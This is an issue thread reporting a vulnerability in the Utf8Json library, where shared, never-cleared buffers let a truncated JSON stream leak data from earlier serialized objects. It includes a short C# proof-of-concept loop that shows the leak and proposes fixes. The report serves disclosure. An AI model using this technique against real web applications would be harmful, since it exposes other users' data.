Deserialize from stream introduces a serious vulnerability due to shared buffers

[tomasfreund]

I have encountered an issue when implementing error handling for malformed json in my web application, instead of unexpected end of string I was getting error messages with unexpected char that was not even in the json. After some digging I discovered an exploit that enables an attacker to read data from previously serialized objects. This exploit can be used to target any web application that uses the MVC formatters in this repository or parses json from stream using this library. The example below illustrates the issue.

            for (int i = 0; i < 1000; i++)
            {
                Utf8Json.JsonSerializer.Serialize(new {SomeValue = "ABCDEFGHIJKLMNOPQRSTUVWKYZ1234567890"});
            }

            for (int i = 0; i < 1000; i++)
            {
                try
                {
                    var ms = new MemoryStream(System.Text.Encoding.UTF8.GetBytes("{\"SomeValue\":\""));
                    var value = Utf8Json.JsonSerializer.Deserialize<dynamic>(ms);
                    // outputs 'ABCDEFGHIJKLMNOPQRSTUVWKYZ1234567890'
                    Console.WriteLine(value["SomeValue"]);
                }
                catch (Exception ex)
                {
                    
                }
            }

This issue is caused by sharing buffers that are never cleared and could be solved by clearing the buffers or by passing the length to the reader in adittion to the buffer.

There is already an issue (#127) regarding this (6 months old) but it does not mention the security impact (especially for web applications using the formatters)

[unikzforce]

it seems serious too me.

[MichaelTontchev]

Is there any update for this?